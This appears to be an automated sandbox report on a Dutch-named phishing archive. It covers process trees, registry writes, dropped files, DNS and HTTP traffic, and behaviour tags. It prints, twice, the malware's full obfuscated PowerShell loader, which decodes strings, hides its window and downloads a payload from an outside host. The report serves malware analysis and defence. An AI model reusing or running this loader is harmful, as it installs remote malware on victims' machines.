g.n;Beef fi,iWRubei oennLyse6Komm4Over;Bar. MoguxThur6Etap4Ire ; Per S darA.kevSpar:E,te1Galg3Rent9Symm. Ge 0abla) For sk dGMulteSpircChonkFurmoFlyd/Beat2Spni0Idrt1 fka0Nona0 Cl 1Unap0Galp1bear LedF ForipontrTicieM ldfD,mio AflxSlum/Agl 1Kolo3Mine9An r. Pho0';$Kommuneplanernes=Baptisia 'Realu BaasReakE FdeRPic,-WindAVe ggFli EHeilnOprit';$Opsimath=Baptisia 'Desch GuatSpndtKnutp EkssEleu:Amph/afkn/fo,tsUroph Sc.iPh sn sceoSaliburesi ClasVandiRetss CyctIncre Ebum Halayams.Dis rmusoo Phy/ AppD eodyImpobPilsl prie M ln Cubs Ono.Tr cxEftetMarip';$Gennembrydes33=Baptisia 'Dybs>';$Bredbaandssatellittens=Baptisia 'UncriUdspEbullx';$nivosity='phenazins';$Hansa='\Ostraciidae.Lyd';Pylangial (Baptisia 'Egos$Semig PapL patOSatsbJannA Tndl ef:GenkH mpVS fiiMe adDdtahFradO Fe VTolvEUltrD fgrEBrnet dsn= co $MomsefiloNUnchvSkyg:n rvadeclpEgnsPIndsDAsseaSmelTQua A er+Bung$ UnihFlugA G,eNFljts eliA');Pylangial (Baptisia ' Pro$,ayagKu lLMateo BorbSu mAReopLIjon:Torpo idevSandELakfrUnkePK,peo ashTEk.pe U,dNchortUdsvL EdiYC lc=Quar$ Bs O ygepAp,rsModeISulfM.iviARedoTEnamhUnst. NapsTidspA lgL.ubcIGue TT ra(Br m$StragSupeE .oon AmmnCactENonsMEje bCy.lr F uYUbesdCyprEBru,sOut 3 Kon3 So )');Pylangial (Baptisia $Lido);$Opsimath=$Overpotently[0];$Precolorable=(Baptisia 'ball$SygegLeuclHjerOBurrBCounAEvolLMini:St,elSm aE OptJ ekoEKonts H dOSn,rlSklmdAk.iAsalatLdig= SubNchikeCompWPero-P,tsoFil BUnmajRusfEDiv,CAt otModf EgenSBeshy Duns Bi tportE enMScen.Aleb$HenrALidtN Face SpeCDoluDAfp oKol tMej.A ReiLVit LArriY');Pylangial ($Precolorable);Pylangial (Baptisia ',pfi$Axu,LIslneCapijRumseTumls Muno ilsl reldStata EnttS,ik.TranH Stie Eida Udsd Vale LabrCemesdy l[,eks$BedvKSpiooHoldmtitamFuglu Hj.nHjl eDolop Irrl la.a LolnSkileFlelrBesynHas.e nmosO at]Biss=Unex$SubaU FaenR teeKvadm UnmoAsyltPresi oexosoranSekoaK mplK,triSulfsPebem');$Nonfundedndorsing=Baptisia 'antiD owdoAli w Stan aralTempo aagaKe ndIagtF,niniHalflB.nde';$Eksempells=Baptisia '.utl$PrefL vbleNonajGigmeSchwsBo foBolil Tj.dRe.iaOldctSpil.metr$Ter NFlgeoH innDhabfVoldu VarnGeodd Fo.eBisud AtonGr,ydGaveo E urU.susAvisiiltfnPiz gD,sp. DeiIflagn Sy v Sa oMed kSuffeR,en( B r$ YarOEngepSkovsAveriRabbmChafaHovnt inthbrun, tio$ DozM OmfiMu,ekPha aBrasdMicroKvajiDyndsA bem khi)';$Mikadoism=$Hvidhovedet;Pylangial (Baptisia ',ell$UdelGBefal Cr o agnB SanATuvaLP ss:S.misu koK,ribRForlmSoftBG,lerA,theLakfDTra,DTaa e xemrIndss lam= Exp( reyTAzopEBracsst vTHin -suliP,nsiAcre TMod,HU of Push$BedrMManuiIsogkSjosABaandLolloLed IElhesDefemgalv)');while (!$Skrmbredders) {Pylangial (Baptisia ' old$StvegBefolPa ao.rflbJensaRverl Eks:BldeNBoasiCullc nalkSti e nstrShe eRaisdje b=Crin$TokaS rtuKuttp KbeeOmvarincldTer eU dev ibbi.rodlEcheiMa,os undh') ;Pylangial $Eksempells;Pylangial (Baptisia 'Ak.v[Ga otAlleHUneprBeskeDissa AntDK ffiAngiNSub GEcro.MagiT atohMaxiRForse pleAJu adGorm]Smol:Decu:FrotST roLE ydEP odeStenpnone( sup4Prec0M.mn0kryd0 bal)');Pylangial (Baptisia 'Nonp$E,etGHydrl.btuo,iohbOptaa eksL par:ForsSBob.kFinaR,redMSur.Bjos RFalleUnred Misd SidEB,nsrDuu SSili=anim(De ttCo tECrosSPyr.T lo-Cerap WhoAMatrTEvneHIllu Hjer$forbM BraIdisekNoneaTilgdAracOB awIDratsPlasM Pla)') ;Pylangial (Baptisia ' ind$ Le GsabeLErigoSacrBPleuaTravLn.ve:Acc.DKontIBov HGedeYLevaD KarrMotooIntecSvejHPhreL.espODiabRileni ,mid UnpESi k=Mudp$ Cr Gst,oL ToroFynbb Fi A H gLSacc:T leSRettOF,stlProdE Eboa un + .pe+U.de%Fro $ fl oirr vblake ,isR K ap IsoOFrokt MenE cern alvt synlWellY Hor.UnricU deO InduE tenNasaT') ;$Opsimath=$Overpotently[$dihydrochloride]}$Nonfundedsa156=416029;$Selvforsynende=30313;Pylangial (Baptisia 'Bagh$ Af,gMcgelVeilOreglBkapla .alLFr,t:An ntPhyliGalvlCi cPKrn lPesaI ettgNitrTi.juE PyrT Bar hyme= Kun KubiGc ntEAromTAnge-p occMuzzo.isoNPhretS ipe.nvoNS ritKrmm Unb$,ontM livITakskUkamAFised U co veriBoisSCl pM');Pylangial (Baptisia ' Til$R tug islDo oo T bb araaecc.lPros:PhalKSt.mrM dluHygimUnrumUdtaeUdetnHjaddJenoeM,ngsUnfa7Stru5Tens vind= .la ar[AssaSNonbyB sksSemitVandePhremSven.com.CDescoObsen Fatvin.de Ti rImdet Hel] fsk:Glut: DmrFCancrSm,koSko mA giBHo,earundsPre.eFors6 Lum4 PerSudgrtTogpr .ili Kn nIssugCur (Sk p$WhauTProvi aslScanpSmislRegii L.vg Runt St.eFuldtUpup)');Pylangial (Baptisia ' lti$ UdbG AstLU exoSt.lB St aWamplP.nt:.ompfAf rrStyruaftogPurpt EnvaOrthvSag LResuEO erR AwaExe,onArthsSnyd rdi= re Ryst[JackSBanky SarSRatcT ejsE QuaMcur .CommTBroneHemaXFratt.urb. Lrke F,nN CelCDechoIncidSpi iCha.nC reGUpbr] ela: Whi: aunAMi oSSvedCoutbIBesmi Spo. No g JoyEGau TProssDanntEfter agtIS ecN ThoGFilm(Negr$P.rakCrowRE.iguJo.dMHospMPlode MonnUdklDButie oksUnif7Gang5Esti)');Pylangial (Baptisia 'A.mi$Fu,lGP,grL De oke nBTickaIngrL Dig: admsImp eFirmBF rou IndnPreadOveryAfsy=Naur$.amefBrndRBoy UIndeGBaynTGenoA leuvB,falAfvreOrk RGratEsamtnSynssAngr.Hazes Di UUpseBFernSRevst esrIn miLivsN A mg.obb(Zinc$HaanNChilOStrinNudiF,tenu usN StoDmetheSisydMultSZimbaNeem1Guld5Peac6Fl t,Ato $ forS CereBu.dLEk.pVO beFLic O To RElekSKik YFl,pnRidnePre,N casDSub.e O d)');Pylangial $Sebundy;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

0

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll

3752

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-counter;Get-Service;$Transcondyloid='B'+ [char]58;Get-hotfix;$krften=(gcm $Transcondyloid).CommandType;$krften=[String]$krften;New-Alias -Name Efterretning -Value ni;$krften+=':';(Efterretning -p $krften -n Baptisia -value { param ($Windowsill);$Nonfunded=4;do {$Honnrmarchen+=$Windowsill[$Nonfunded];$Nonfunded+=5} until(!$Windowsill[$Nonfunded])$Honnrmarchen});(Efterretning -p $krften -n Pylangial -value {param ($Vocabular);.($Bredbaandssatellittens) ($Vocabular)});ConvertTo-Html;$Anecdotally=Baptisia 'FunknUndeER cuTPreb. Sstw';$Anecdotally+=Baptisia 'NadnEOpvabPrinCAfsplhoveiEuraE RannC ffT';$Unemotionalism=Baptisia 'Jn nMEpanoKystz naviLokil BohlOm iaSoli/';$Emblazons=Baptisia ' MilTHejslSatssAads1Un e2';$Lido='flsk[Morbn ComeGoomtAmp .BegySAdhsENigorVolcVStati NonCReciE A,opLageO ascITr an ortpr,dmS,riaAnfonG.nsA WatG,bsteHundrIn.f] Pr.:Euct: troS SsteKataCmarkuFo dRKorrIBarftE esyvuggpStanRSpidoUdehtReoroAspaCA,omoKvinLOver=Dizd$Lavie TegM RepBParalM.ljAFibrz omaO .awN ydiS';$Unemotionalism+=Baptisia '.pli5 Til.Nepe0Erhv Unpa(KollW L niJackn LysdLeptoEvenwForbsPre Ras.NFrugTReat Elpr1Badg0Mili.Ufoe0 g.n;Beef fi,iWRubei oennLyse6Komm4Over;Bar. MoguxThur6Etap4Ire ; Per S darA.kevSpar:E,te1Galg3Rent9Symm. Ge 0abla) For sk dGMulteSpircChonkFurmoFlyd/Beat2Spni0Idrt1 fka0Nona0 Cl 1Unap0Galp1bear LedF ForipontrTicieM ldfD,mio AflxSlum/Agl 1Kolo3Mine9An r. Pho0';$Kommuneplanernes=Baptisia 'Realu BaasReakE FdeRPic,-WindAVe ggFli EHeilnOprit';$Opsimath=Baptisia 'Desch GuatSpndtKnutp EkssEleu:Amph/afkn/fo,tsUroph Sc.iPh sn sceoSaliburesi ClasVandiRetss CyctIncre Ebum Halayams.Dis rmusoo Phy/ AppD eodyImpobPilsl prie M ln Cubs Ono.Tr cxEftetMarip';$Gennembrydes33=Baptisia 'Dybs>';$Bredbaandssatellittens=Baptisia 'UncriUdspEbullx';$nivosity='phenazins';$Hansa='\Ostraciidae.Lyd';Pylangial (Baptisia 'Egos$Semig PapL patOSatsbJannA Tndl ef:GenkH mpVS fiiMe adDdtahFradO Fe VTolvEUltrD fgrEBrnet dsn= co $MomsefiloNUnchvSkyg:n rvadeclpEgnsPIndsDAsseaSmelTQua A er+Bung$ UnihFlugA G,eNFljts eliA');Pylangial (Baptisia ' Pro$,ayagKu lLMateo BorbSu mAReopLIjon:Torpo idevSandELakfrUnkePK,peo ashTEk.pe U,dNchortUdsvL EdiYC lc=Quar$ Bs O ygepAp,rsModeISulfM.iviARedoTEnamhUnst. NapsTidspA lgL.ubcIGue TT ra(Br m$StragSupeE .oon AmmnCactENonsMEje bCy.lr F uYUbesdCyprEBru,sOut 3 Kon3 So )');Pylangial (Baptisia $Lido);$Opsimath=$Overpotently[0];$Precolorable=(Baptisia 'ball$SygegLeuclHjerOBurrBCounAEvolLMini:St,elSm aE OptJ ekoEKonts H dOSn,rlSklmdAk.iAsalatLdig= SubNchikeCompWPero-P,tsoFil BUnmajRusfEDiv,CAt otModf EgenSBeshy Duns Bi tportE enMScen.Aleb$HenrALidtN Face SpeCDoluDAfp oKol tMej.A ReiLVit LArriY');Pylangial ($Precolorable);Pylangial (Baptisia ',pfi$Axu,LIslneCapijRumseTumls Muno ilsl reldStata EnttS,ik.TranH Stie Eida Udsd Vale LabrCemesdy l[,eks$BedvKSpiooHoldmtitamFuglu Hj.nHjl eDolop Irrl la.a LolnSkileFlelrBesynHas.e nmosO at]Biss=Unex$SubaU FaenR teeKvadm UnmoAsyltPresi oexosoranSekoaK mplK,triSulfsPebem');$Nonfundedndorsing=Baptisia 'antiD owdoAli w Stan aralTempo aagaKe ndIagtF,niniHalflB.nde';$Eksempells=Baptisia '.utl$PrefL vbleNonajGigmeSchwsBo foBolil Tj.dRe.iaOldctSpil.metr$Ter NFlgeoH innDhabfVoldu VarnGeodd Fo.eBisud AtonGr,ydGaveo E urU.susAvisiiltfnPiz gD,sp. DeiIflagn Sy v Sa oMed kSuffeR,en( B r$ YarOEngepSkovsAveriRabbmChafaHovnt inthbrun, tio$ DozM OmfiMu,ekPha aBrasdMicroKvajiDyndsA bem khi)';$Mikadoism=$Hvidhovedet;Pylangial (Baptisia ',ell$UdelGBefal Cr o agnB SanATuvaLP ss:S.misu koK,ribRForlmSoftBG,lerA,theLakfDTra,DTaa e xemrIndss lam= Exp( reyTAzopEBracsst vTHin -suliP,nsiAcre TMod,HU of Push$BedrMManuiIsogkSjosABaandLolloLed IElhesDefemgalv)');while (!$Skrmbredders) {Pylangial (Baptisia ' old$StvegBefolPa ao.rflbJensaRverl Eks:BldeNBoasiCullc nalkSti e nstrShe eRaisdje b=Crin$TokaS rtuKuttp KbeeOmvarincldTer eU dev ibbi.rodlEcheiMa,os undh') ;Pylangial $Eksempells;Pylangial (Baptisia 'Ak.v[Ga otAlleHUneprBeskeDissa AntDK ffiAngiNSub GEcro.MagiT atohMaxiRForse pleAJu adGorm]Smol:Decu:FrotST roLE ydEP odeStenpnone( sup4Prec0M.mn0kryd0 bal)');Pylangial (Baptisia 'Nonp$E,etGHydrl.btuo,iohbOptaa eksL par:ForsSBob.kFinaR,redMSur.Bjos RFalleUnred Misd SidEB,nsrDuu SSili=anim(De ttCo tECrosSPyr.T lo-Cerap WhoAMatrTEvneHIllu Hjer$forbM BraIdisekNoneaTilgdAracOB awIDratsPlasM Pla)') ;Pylangial (Baptisia ' ind$ Le GsabeLErigoSacrBPleuaTravLn.ve:Acc.DKontIBov HGedeYLevaD KarrMotooIntecSvejHPhreL.espODiabRileni ,mid UnpESi k=Mudp$ Cr Gst,oL ToroFynbb Fi A H gLSacc:T leSRettOF,stlProdE Eboa un + .pe+U.de%Fro $ fl oirr vblake ,isR K ap IsoOFrokt MenE cern alvt synlWellY Hor.UnricU deO InduE tenNasaT') ;$Opsimath=$Overpotently[$dihydrochloride]}$Nonfundedsa156=416029;$Selvforsynende=30313;Pylangial (Baptisia 'Bagh$ Af,gMcgelVeilOreglBkapla .alLFr,t:An ntPhyliGalvlCi cPKrn lPesaI ettgNitrTi.juE PyrT Bar hyme= Kun KubiGc ntEAromTAnge-p occMuzzo.isoNPhretS ipe.nvoNS ritKrmm Unb$,ontM livITakskUkamAFised U co veriBoisSCl pM');Pylangial (Baptisia ' Til$R tug islDo oo T bb araaecc.lPros:PhalKSt.mrM dluHygimUnrumUdtaeUdetnHjaddJenoeM,ngsUnfa7Stru5Tens vind= .la ar[AssaSNonbyB sksSemitVandePhremSven.com.CDescoObsen Fatvin.de Ti rImdet Hel] fsk:Glut: DmrFCancrSm,koSko mA giBHo,earundsPre.eFors6 Lum4 PerSudgrtTogpr .ili Kn nIssugCur (Sk p$WhauTProvi aslScanpSmislRegii L.vg Runt St.eFuldtUpup)');Pylangial (Baptisia ' lti$ UdbG AstLU exoSt.lB St aWamplP.nt:.ompfAf rrStyruaftogPurpt EnvaOrthvSag LResuEO erR AwaExe,onArthsSnyd rdi= re Ryst[JackSBanky SarSRatcT ejsE QuaMcur .CommTBroneHemaXFratt.urb. Lrke F,nN CelCDechoIncidSpi iCha.nC reGUpbr] ela: Whi: aunAMi oSSvedCoutbIBesmi Spo. No g JoyEGau TProssDanntEfter agtIS ecN ThoGFilm(Negr$P.rakCrowRE.iguJo.dMHospMPlode MonnUdklDButie oksUnif7Gang5Esti)');Pylangial (Baptisia 'A.mi$Fu,lGP,grL De oke nBTickaIngrL Dig: admsImp eFirmBF rou IndnPreadOveryAfsy=Naur$.amefBrndRBoy UIndeGBaynTGenoA leuvB,falAfvreOrk RGratEsamtnSynssAngr.Hazes Di UUpseBFernSRevst esrIn miLivsN A mg.obb(Zinc$HaanNChilOStrinNudiF,tenu usN StoDmetheSisydMultSZimbaNeem1Guld5Peac6Fl t,Ato $ forS CereBu.dLEk.pVO beFLic O To RElekSKik YFl,pnRidnePre,N casDSub.e O d)');Pylangial $Sebundy;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll

3960

C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe -Embedding

C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe

—

svchost.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Windows Modules Installer Worker

Version:

10.0.19041.3989 (WinBuild.160101.0800)

Modules

Images
c:\windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\tiworker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll

4412

"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Verzoek om het indienen van een spoedofferte.gz"

C:\Program Files\WinRAR\WinRAR.exe

—

explorer.exe

User:

admin

Company:

Alexander Roshal

Integrity Level:

MEDIUM

Description:

WinRAR archiver

Version:

5.91.0

Modules

Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll

Add for printing

Total events

76 870

Read events

76 847

Write events

23

Delete events

0

Modification events


(PID) Process:	(4412) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	3
Value: C:\Users\admin\Desktop\preferences.zip
(PID) Process:	(4412) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	2
Value: C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:	(4412) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	1
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:	(4412) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	0
Value: C:\Users\admin\AppData\Local\Temp\Verzoek om het indienen van een spoedofferte.gz
(PID) Process:	(4412) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	name
Value: 120
(PID) Process:	(4412) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	size
Value: 80
(PID) Process:	(4412) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	type
Value: 120
(PID) Process:	(4412) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	mtime
Value: 100
(PID) Process:	(4412) WinRAR.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\MuiCache\3c\52C64B7E
Operation:	write	Name:	@C:\WINDOWS\System32\acppage.dll,-6003
Value: Windows Command Script
(PID) Process:	(4412) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:	write	Name:	ShellExtBMP
Value:

Add for printing

Executable files

0

Suspicious files

2

Text files

27

Unknown types

0

Dropped files

PID	Process	Filename		Type
1896	notepad++.exe	C:\Users\admin\AppData\Roaming\Notepad++\langs.xml		xml
		MD5:FE22EC5755BC98988F9656F73B2E6FB8	SHA256:F972C425CE176E960F6347F1CA2F64A8CE2B95A375C33A03E57538052BA0624D
2320	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive		binary
		MD5:3F51BCB0A5D4157196C1040B5D6CF753	SHA256:9723B33E298650F04AA2C3665BB178AACBACA6FF4A6F88EAC999145D72F3697E
6656	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4540tjw4.dhz.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1896	notepad++.exe	C:\Users\admin\AppData\Roaming\Notepad++\plugins\config\converter.ini		text
		MD5:F70F579156C93B097E656CABA577A5C9	SHA256:B926498A19CA95DC28964B7336E5847107DD3C0F52C85195C135D9DD6CA402D4
3960	TiWorker.exe	C:\Windows\Logs\CBS\CBS.log		text
		MD5:2B43B864E32E0430E878F621092D947C	SHA256:38BB8EEDF8BF8728286D28E777CC9DA38C82DBC12F7F066F54076861C175019F
2320	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5wagp5mv.gdv.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6656	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uwwjzcc4.ega.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6656	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache		binary
		MD5:B66160FF0333F1EF5875C96CB2531BE2	SHA256:C0377FD427638B3D199A910DC62A9900CBE9431D0420AEC6F6FC16421DB55A52
1896	notepad++.exe	C:\Users\admin\AppData\Roaming\Notepad++\config.xml		xml
		MD5:A2ED875AA42589077C4D08F4F8912018	SHA256:77B0174D655F327C1FC9520B4F8831ECD82E98351B26BB9C2EDD98FF0CD63A2D
1896	notepad++.exe	C:\Users\admin\AppData\Roaming\Notepad++\stylers.xml		xml
		MD5:312281C4126FA897EF21A7E8CCB8D495	SHA256:53B4BE3ED1CFD712E53542B30CFE30C5DB35CC48BE7C57727DFEC26C9E882E90

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

5

TCP/UDP connections

25

DNS requests

18

Threats

0

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
420	svchost.exe	GET	200	184.30.131.245:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
1268	svchost.exe	GET	200	23.48.23.156:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
3480	SIHClient.exe	GET	200	95.101.149.131:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
1268	svchost.exe	GET	200	95.101.149.131:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
3480	SIHClient.exe	GET	200	95.101.149.131:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
1268	svchost.exe	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
5944	MoUsoCoreWorker.exe	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
5476	RUXIMICS.exe	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
2336	svchost.exe	172.211.123.248:443	client.wns.windows.com	MICROSOFT-CORP-MSN-AS-BLOCK	FR	whitelisted
420	svchost.exe	20.190.160.14:443	login.live.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
420	svchost.exe	184.30.131.245:80	ocsp.digicert.com	AKAMAI-AS	US	whitelisted
1268	svchost.exe	23.48.23.156:80	crl.microsoft.com	Akamai International B.V.	DE	whitelisted
1268	svchost.exe	95.101.149.131:80	www.microsoft.com	Akamai International B.V.	NL	whitelisted

DNS requests

Domain	IP	Reputation
google.com	142.250.185.206	whitelisted
client.wns.windows.com	172.211.123.248	whitelisted
login.live.com	20.190.160.14 20.190.160.22 40.126.32.68 20.190.160.130 20.190.160.3 20.190.160.128 40.126.32.76 40.126.32.133	whitelisted
ocsp.digicert.com	184.30.131.245	whitelisted
settings-win.data.microsoft.com	40.127.240.158 4.231.128.59 20.73.194.208	whitelisted
crl.microsoft.com	23.48.23.156 23.48.23.143	whitelisted
www.microsoft.com	95.101.149.131	whitelisted
shinobisistema.ro	195.246.242.7	unknown
nexusrules.officeapps.live.com	52.111.227.13	whitelisted
slscr.update.microsoft.com	4.245.163.56	whitelisted

Threats

No threats detected

Add for printing

Process	Message
notepad++.exe	VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe	VerifyLibrary: certificate revocation checking is disabled
notepad++.exe	ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe	VerifyLibrary: C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe	VerifyLibrary: certificate revocation checking is disabled
notepad++.exe	VerifyLibrary: error while getting certificate informations

General Info

Verzoek om het indienen van een spoedofferte.gz

6566C6AB5427DC88BE1F1E82D7753BBE

56797ECF9112B8517258313EEF84FE7A2FEAFCA8

0F181450B0B8FDAC4AF7203733DD29C58729D14042F610F254D6CC254F9C797B

96:K/5Lq843vLwxpKugBYe4ovaCKy/BPjRYtbB2/HTw5A0dfwAhZj4sew/M:K/ALUuBv4ovRFYtbqSwUj4semM

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Generic archive extractor

Run PowerShell with an invisible window

Script downloads file (POWERSHELL)

Executes malicious content triggered by hijacked COM objects (POWERSHELL)

SUSPICIOUS

The process checks if it is being run in the virtual environment

Uses base64 encoding (POWERSHELL)

Gets or sets the security protocol (POWERSHELL)

Uses sleep to delay execution (POWERSHELL)

Retrieves command line args for running process (POWERSHELL)

Creates an instance of the specified .NET type (POWERSHELL)

Starts POWERSHELL.EXE for commands execution

Converts a specified value to a byte (POWERSHELL)

INFO

Creates or changes the value of an item property via Powershell

Manual execution by a user

Uses string split method (POWERSHELL)

Disables trace logs

Checks proxy server information

Converts byte array into ASCII string (POWERSHELL)

Gets data length (POWERSHELL)

Script raised an exception (POWERSHELL)

Malware configuration

Static information

TRiD

EXIF

ZIP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings